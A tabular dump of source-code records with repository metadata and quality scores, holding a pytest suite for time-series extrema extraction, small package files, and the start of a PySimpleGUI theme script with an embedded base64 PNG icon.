hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e00c038d9c05244d719af37b568a13c6c82597f | 8,852 | py | Python | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 2 | 2021-03-12T10:48:20.000Z | 2021-04-23T09:37:18.000Z | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 27 | 2020-07-22T15:49:25.000Z | 2021-06-18T09:40:48.000Z | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 1 | 2021-06-01T12:49:53.000Z | 2021-06-01T12:49:53.000Z | import os
import sys
import numpy as np
import pandas as pd
import pytest
plugin_root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname((os.path.dirname(os.path.dirname(os.path.realpath(__file__))))))))
sys.path.append(os.path.join(plugin_root, 'python-lib'))
from dku_timeseries import ExtremaExtractor
from recipe_config_loading import get_extrema_extraction_params
@pytest.fixture
def columns():
class COLUMNS:
date = "Date"
extrema = "value1"
return COLUMNS
@pytest.fixture
def df(columns):
co2 = [315.58, 316.39, 316.79, 316.2]
country = ["first", "first", "second", "second"]
time_index = pd.date_range("1-1-1959", periods=4, freq="M")
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, columns.date: time_index})
return df
@pytest.fixture
def long_df(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 345, 234, 100, 299]
nan = np.ones(8) * np.nan
country = ["first", "first", "first", "first", "second", "second", "second", "second"]
half_nan = [np.nan, np.nan, np.nan, np.nan, 1, 2, 3, 4]
time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "nan": nan, "half_nan": half_nan, columns.date: time_index})
return df
@pytest.fixture
def long_df_2(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10]
half_nan = [np.nan, np.nan, 7, 2, 1, 2]
country = ["first", "first", "second", "second", "third", "third"]
country_2 = ["first", "first", "second", "second", "third", "third"]
time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append(
pd.date_range("1-1-1959", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "half_nan": half_nan, columns.date: time_index})
return df
@pytest.fixture
def long_df_3(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10, 2, 3]
country = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
country_2 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
country_3 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append(
pd.date_range("1-1-1959", periods=2, freq="M")).append(pd.date_range("1-1-1959", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "store": country_3, columns.date: time_index})
return df
@pytest.fixture
def long_df_4(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10, 2, 3]
country = ["first", "first", "second", "second", "third", "third", "first", "first"]
country_2 = ["first", "first", "second", "second", "third", "third", "second", "first"]
country_3 = ["first", "first", "second", "second", "third", "third", "third", "fourth"]
time_index = pd.date_range("1-1-2020", periods=2, freq="M").append(pd.date_range("1-1-2020", periods=2, freq="M")).append(
pd.date_range("1-1-2020", periods=2, freq="M")).append(pd.date_range("1-1-2020", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "store": country_3, columns.date: time_index})
return df
@pytest.fixture
def long_df_numerical(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 345, 234, 100, 299]
country = [1, 1, 1, 1, 2, 2, 2, 2]
time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, columns.date: time_index})
return df
@pytest.fixture
def recipe_config(columns):
config = {u'window_type': u'none', u'groupby_columns': [u'country'], u'closed_option': u'left', u'window_unit': u'seconds', u'window_width': 1,
u'causal_window': False, columns.date: u'Date', u'advanced_activated': True, u'extrema_column': columns.extrema, u'extrema_type': u'max',
u'aggregation_types': [u'average'], u'gaussian_std': 1}
return config
@pytest.fixture
def params(recipe_config):
return get_extrema_extraction_params(recipe_config)
class TestExtremaLongFormat:
def test_long_format(self, long_df, params, recipe_config, columns):
groupby_columns = ["country"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-01-03T00:00:00.000000000', '1959-01-01T00:00:00.000000000']))
np.testing.assert_array_equal(output_df.country.values, np.array(["first", "second"]))
extrema_column = "nan"
output_df = extrema_extractor.compute(long_df, columns.date, extrema_column, groupby_columns=groupby_columns)
assert output_df.shape == (2, 1)
extrema_column = "half_nan"
output_df = extrema_extractor.compute(long_df, columns.date, extrema_column, groupby_columns=groupby_columns)
assert output_df.shape == (2, 6)
def test_two_identifiers(self, long_df_2, params, recipe_config, columns):
groupby_columns = ["country", "item"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_2, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000',
'1959-02-28T00:00:00.000000000']))
extrema_column = "half_nan"
output_df = extrema_extractor.compute(long_df_2, columns.date, extrema_column, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df.half_nan.values, np.array([np.nan, 7., 2.]))
assert output_df.shape == (3, 6)
def test_three_identifiers(self, long_df_3, params, recipe_config, columns):
groupby_columns = ["country", "item", "store"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_3, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-02-28T00:00:00.000000000', '1959-02-28T00:00:00.000000000',
'1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000']))
def test_mix_identifiers(self, long_df_4, params, recipe_config, columns):
groupby_columns = ["country", "item", "store"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_4, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000',
'2020-01-31T00:00:00.000000000', '2020-01-31T00:00:00.000000000',
'2020-02-29T00:00:00.000000000']))
def test_empty_identifiers(self, df, params, recipe_config, columns):
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema, groupby_columns=[])
assert output_df.shape == (1, 4)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema)
assert output_df.shape == (1, 4)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema, groupby_columns=None)
assert output_df.shape == (1, 4)
def test_long_format_numerical(self, long_df_numerical, params, recipe_config, columns):
groupby_columns = ["country"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_numerical, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-01-03T00:00:00.000000000', '1959-01-01T00:00:00.000000000']))
np.testing.assert_array_equal(output_df.country.values, np.array([1, 2]))
| 53.648485 | 155 | 0.655897 | 1,224 | 8,852 | 4.564542 | 0.107843 | 0.035797 | 0.031502 | 0.034365 | 0.807589 | 0.799893 | 0.787006 | 0.77394 | 0.730267 | 0.703061 | 0 | 0.098558 | 0.185043 | 8,852 | 164 | 156 | 53.97561 | 0.675908 | 0 | 0 | 0.390977 | 0 | 0 | 0.15906 | 0.052418 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.112782 | false | 0 | 0.052632 | 0.007519 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3e16dd32cb75ba86a1ea002365e89f8611e80166 | 42 | py | Python | Segment_Transparent_Objects/segmentron/__init__.py | gauthamnarayan/transparent_liquid_segmentation_icra2022 | 692a59a5fc5a771d1e8cb65fe4588514db2568fe | [
"MIT"
] | 654 | 2019-11-16T16:12:06.000Z | 2022-03-31T16:55:34.000Z | segmentron/__init__.py | djx2726889/Trans2Seg | 3972916bba7f985ca1aabc047fea56bdec9e9e5d | [
"Apache-2.0"
] | 66 | 2019-11-25T02:15:33.000Z | 2021-11-15T02:54:49.000Z | segmentron/__init__.py | djx2726889/Trans2Seg | 3972916bba7f985ca1aabc047fea56bdec9e9e5d | [
"Apache-2.0"
] | 145 | 2019-11-16T16:12:10.000Z | 2022-03-31T07:21:09.000Z | from . import modules, models, utils, data | 42 | 42 | 0.761905 | 6 | 42 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 42 | 1 | 42 | 42 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e17152010865af19ce8abc6dbceab44b2bc832b | 104 | py | Python | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | VERSION = (0, 0, 2)
def get_version(version=VERSION):
return ".".join(map(lambda x: str(x), version)) | 20.8 | 48 | 0.663462 | 17 | 104 | 4 | 0.647059 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.134615 | 104 | 5 | 48 | 20.8 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
3e1e88fa634799c08052fcea50fae6ad3950376c | 31,515 | py | Python | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | import PySimpleGUI as sg
white = "#fff9e5"
# sweet_green = "#567b79"
sweet_red = "#61363d"
sweet_light_red = "#8b6962"
vibrant_red = "#c13d37"
# sweet_brown = "#80493a"
sg.theme_background_color(sweet_red)
sg.theme_element_background_color(sweet_red)
sg.theme_text_element_background_color(sweet_red)
sg.theme_text_color(white)
sg.theme_button_color(vibrant_red)
logo_image = r'C:\Users\ahmet\PycharmProjects\RandomSyllables\src\resources\logo.png'
icon = b'iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAEAYAAAAM4nQlAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAABOvQAATr0Bc2poFAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAACAASURBVHic7J13YFzVsf/n3Lt9ZUmWtKviKksruQIu2BTb2MEQTA0B0x8JkJAQHsQktiSbJBYkoGIbBwgv1EcSSmihmd6LAdNccNeuJNuyZWlXsrq23nt+f8w7v7W3qFjSaiXN55/Vvedqd6TdvWfOnJnvABAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRAEQRBEX2GDbQBBEARxYnDO+bJlstzQ4HBMnDh/PgBjknT++ZxzDjBzJl41aRI+sv+733d04E+bNqkq55y/8kp6el5eefn77w/G30AMHuQAEARBDBEaGvbtu/POMWNUVZICgf/+bzx7ww34mJ7et2f/5BNZBpCkW29NTbXZSkp27+7b8xHxDjkABEEQcYrLZbevXDlrFgCALC9fzjkA51ddhaNa7cC8ans7RgiuucZisdnKyjZuHJjXIQYbcgAIgiAGGQzZM9bQ4HAUFFx0EeecM7ZyJYbt58/v6fN0dvr9jAHs3dvYqNEA1NS0tUkSgNcbCDAGkJ5uNqsqwOzZmZl+P0BCglbLebRnUxRVBQC47LKMDJutrOy11/rjbyXiB3IACIIgYgznnBcXS5LL5XB0dv70pwAAjP3hDzh68snd/z66Bjt2OJ2yDPDRR/v36/UAO3a4XLIMEAioKuvi7m4y4cR/5ZVTpng8AIsWTZjg80W72u0GkCSAc8+1WnNyyso2bert30vEJ+QAEARBDDDBZD27PSfniisAGOP8zjtx9T1tWne/7/MpCgDApk2HDul0AO+/X1Wl1wPU1ra3S1Lf7bvggtxcrxfgiivQIYiM0ylJqqrRzJqVlpaff889hw/3/ZWJwYQcAIIgiH5GTPhOZ2XlpEnXXour8dWrce2en9/d77e2er2SBPDee9XVOh3Axx/v36/TAbS3Y4h/oFi2DB2ACy9EhyAczgE2bbJYDh82GhcvZmzx4uLiQGDgLCIGEs1gG0AQBDHUEXv4LpfDUVBw2WUul8PB2J//jJP15Mnd/X5zs9fLGMDbb1dW6vXBCd/rVZSBnPBDeemlPXv0eoAxYxISVBVg5syMDL//2CswJ8HpHDvW7f7jH/HcmjWxs5DoTygCQBAEcYLU19vtRUXnnssYAOf33INn58zp7veOHvV4JAngrbccDr0e4JNPDh7U6QD8fgz1DzYiR+DuuxcubG8HsFhMJkwIPBa/H4BzVZ0712rNy1u7dtu2wbCVOHHIASAIgughDQ379hUUzJ2rqpLEWFkZnl20qLvfa2zs7JQkgI0bccL//POaGq22+2S9wSYnZ/RoRQH4wx/OPLOjA0CSGAuvGti2zWJpaWlqmjuXsTlzHn30+JgBEb/QFgBBEEQUmpqqq5cvT072+xXFYLjrLlTOEwI80dPv2tt9PlzhV1bqdLiXr9fHzwq/p1RWNjXJMsC771ZV6XQAS5fm5ITnBpxySkNDUlJy8urVeHzXXbG2kzgx4tj3JAiCGBycTru9qGjZMgAAzv/2NzxrtUa73uPBif3DD3Gi37jRbjcYANzu4ZEgp9FI0rFbAmPGjBoVviWAWgOqOm+exWKzrV27Zctg2Er0HHIACIIY8TQ07Nu3atXkyaoqSar6P/+DZxcvjna9CN2LLP0337Tb9fqBz9IfbGy2lBRFAbjzzjP
OaG8HYCzSX7tli8Vy6JDROG8eVQnEN/1QQUoQBDG0CGbt2+2Fhb/7HU78Iokt+sS/Z09Dg0YD8Ic/fPJJQgLA88/v3m0wDP+JX2C3Hz0qy8EtjcjMmuVyjR3rdq9YEUvbiN4zAj6yBEEQiMu1d29BQVYWgEbD2D//iY7AkiXRrhf1+P/+9+7dej3AV18dOqTVBpX4Rio6nSwDAPzlL2ed1dYWlBg+HrcbJY2nT09Pz8srLa2qir2lRFdQBIAgiGFPfb3DUVR06aWcyzJjP/wQbeIXE/vHHx84oNMBFBXhSv/LL1GBb6RP/AKhTPiPf/zwg9EY7f9iNDLGGOd//3vsLSR6An2UCYIYdlRXV1cXFxsMJlMg4HY/8ABOTr/8ZbTrhRDPY49t3WoyAezc6XJpqEaqx/zyl6ec4nYDzJ8/blykngKok3DddRaLzVZe/swzsbeQiAQ5AARBDBtcrt27V6/OzATQahXllVewZn3evGjX79iBE/1jj23bZjQCtLSgQA/RO0RXwZKSxYvb2wESE/X68C2BhoZAQFUDgSlTsrLy89evb2gYDFuJIPRRJwhiyINlezNnqqpWqyibN0eb+P1+lNZ95pmdO41GgPXrN282mWji7ysiCfK55/bsMRiiXZWWptFIkkZTWhpL24joUASAIIghi8tltxcUXHst7kE//jieDZ+Cjhzp6JAkgAce+OYbs7n/uugRx4OhfoCCgtNO6+wEmDrVYgkvAuQc9QIWL0a9gE8/HQxbCYoAEAQxBKmvt9sLC++6Cyf+p5/Gs+ET/44dTqdGA3D33Z9/npBAE/9AI5IB//GPHTuMxmjKhygnLEkPP2y32+233Ra9oJAYWOirQBBE3CPq9p1Oh6Oo6P77ManvT3+Kdv3bb6ME7333ffONyQTQ2Tky6vTjhfp6jLi8/jr2PojM5MmJiQBm86pVsbSNCEJfCYIg4hbOOV+2TJZdLodj0qTHHsOzN9wQep1Q5nvyyR9+MBgANm2qqdHpYm0tEYpGg/GWu+9esKCtDWDMmMTE8ORAr1eSVFWSTjklLS0/v6Rk797YWzoyoQgAQRBxB+e7dhUX63Q48f/733g2fOIX9egbNuBKnyb++CIQwOn+8ce3bzeZRCQnFL0elRgfeUREemJt50iFHACCIOIGzj/+uLhYo2lo0Onc7hdewLPYlOdYREi/rGzz5oQEqtuPd6qqmptlGeDjjw8ejO6gLVzocjkcRUXhjh4xMJADQBBE3IAa8n/9K64TL7kkdFxI85aUfPml2QzgcKA2PTE0eOGF3buNRoCmpshll5wDcL52bV2dw7FiRfTui0T/QA4AQRCDjsjqx6Nbbw0dF0p9YuI/eLC1lSb+oYdoj/zvf2MTpVAw+J+SIsucy/L69bG1buRBDgBBEIMGhnxvvjlaVr+YMO677+uvqX5/+PD114cPa7UAW7fW10fausEI0HXX1ddXVBQUnHNOrO0bKdBXiSCImCNu7Jxzzvn//E/ouMjqf+CBb781mwEOHGhpoRX/8OPpp1EvwOtFhcZQGGOMsb//vaampuaOO4zG2Fs4vCEHgCCImCH2dhmTJMb++U88G5zaRQ74E09s324wAOze3dBAyX3Dl4YGt1uSAF59dd++6BLCOTl6vcej0/3hD7G0bSRADgBBEAMO55wXF0uSLAPI8jPP4FSfmRl63Qsv7N6t1wfb7xIjg3ffrarS6brL7Vi5sq7O4Vi9evr0WNo2nCEHgCCIAcflstvd7tWrsc57yZLQ8R9+QMleoeBHjCwUBXf9n3xy+3ajEUBVsV/A8Wi1ssy5ojz+uHAoY2/p8IL+gQRBDBgul92+cuWsWRjYX7MmdPzoUSwHe+SRrVuNxuAWADEyEXoBH364f79WGz4uujw6nXa7x3PzzbG2b7hBDgBBEAMGNn3ZsAGPgrv5QhHuscdw4m9v9/loPUcIXnpp716DIegghsIYY5yXlTU07Nt3551jxsTewuEBfeUIguh3nE6
7vahIKPgtXBg6/s47VVV6PSX5EZHxeAIBxgCefnrnzujJgYmJqipJgcB998XStuEEOQAEQfQb1dXV1cXFBgO2fC0vDx0XSn6vv263UxNYoju+//7IEdQLqKuLtCWAXHGF0+lwFBYuXRpL24YD5AAQBNFvJCQEAm73b36Dwf+JE0PHX3553z69ntrzEr3jqad27jQag5GBcDgHePDBoANK9ARyAAiC6DOibS/u7P/3f4eO19Rgedennx48GH0lRxCRaWx0uxkDeOWVrvUCTKZAwOMpKoqlbUMZcgAIgugz9fUOx6RJF16IR9nZoeNvvulw6PXRyrsIome8/351dVd6AYwBcF5U5HJVVq5alZcXewuHFuQAEATRZzBTO7yJT0sLZnF/+y3u5RJEXxB6AU89hcmBkctG9XrOFUVRRPUJEQ1yAAiCOGFcrr17Cwry8/EoXODn448x5B8IqGqsbSOGLxUVjY0aDcAXX9TURHYsGWPs/POxy+SPfxxr+4YKVIBD9AtY182Y01ldvXq11co554pitUoS54xhna6qpqczBiBJer2qqirnycmMMSbqwzlPTAQAYEyvxyYxJlN/2Yfa82432tnSIkkAjDU3c86Yqh49imuLqirGOGesstJimTy5vLy2tr9ef7jCuSQxJsr9gmuxQABD/Z98cuAAKfsRA8Xzz+/Zo9cDzJqVkeH3A5hMWi3GCBD8RK5dizkqH3zAGGMvvqgog2VvvEEOAHEcTueuXcXFCQmM6fUeT34+7trm53MuSQBTpmDQLT8/mOXNGEBWlsvlcABYrYwBKIpWe2xYTnwhcX9OhO3CA3fHnsEuYP35l6EV4jmFHQBiT1qShH34f7DbCwtbWtC1+eILtOjzzzlXVYC3305Pz88vK9u+vT8tHIrgf++ii0Lfq4qKhgZZBmhqiizkQhD9gSgrFTkmy5ZNmeLxhF41Y4bLZbdnZ19/PR4/+WSs7YxXKB1nhOBy7d69enVmpqJotYoydy7elOfOxWl27lxccWMol7Fx4wbX2vgHJ7xdu9CReOYZVWVMVZ94IiMjN3fdOqdzsO0baOrqtm9fscJsliSTSZZbWvBsMC3rmWdwj/a996qrqd6fGGi0WvzslZUtWtTWBpCaajIdv+nEOWM//GC15uWVlp588uBYGX+QAzDE4fy7726+Wat1OpOTU1NxYuf8tNNwQp83T2hn44Q1fvzgWgsg0ng4F49+P35RxXrc58MAnRCLjbZ7LMvoxODKvTsYw6sZE7cKrRa3AXS6/luhirXHM8/g37BhQ2amzVZWtmtXf71CvOB0VlQUFi5ciK7Qp5+Gjq9Z8/nnCQkA+/ejtjtBDAR6PZaeZmWNGqWqAD/+cU6O1wtw+ulZWX5/+PWSpKqcz5uXlpafX17+zTextzi+oC2AIYJogynLnAcCS5agxvrZZ7tcAJwvWsQY56qakHDs/hdA/zVWUVW3W1EAVLW11ecDUNX2dr8fgPPOzkAAgHOPR1EAOBfXiePgOD6GWjjYyDJjALKckKDVAjA2apRWCyDLKSl6PYAsW60GA4BGk5qK9cddORyiQvmmm3DSu+EG3Ep4+WVVlSSAu+/OyMjJKSvbsSMWf9lAgqH/adNC/xdi7//QIcyzIIj+JD3dbFZVgHPPzc72+QDmzx8/3usFMBh65maqqizjViYAADkA5ADECUeO2O2rVlksssw55xdcgLfRJUtwX/rss3HNnJFxbNlLX6ZSsdJWlIYGjwdAUZqb/f5jJ/iWFnxsa8OJXqzUhxsYiVAU/HsB8DEQOHSooyN4lYgUaLXjxpnNABpNdvaoUQAajcViNEZ7bjEFXn65JKkqwE9/ig7Bf/7DOYCqrlqVnm6zrV1bWTmwf2P/g27QxImhDl1jY2cnY0FHgCD6gkbDGOcAF16Yl+fzAVx0kc3m9QbP9w7OGWNMlr/6aiBsHYqQAxBj6uvt9pUrc3IkiTFZ/slP8EN8ySUAnKvqGWfg9I6r0hNDVXF
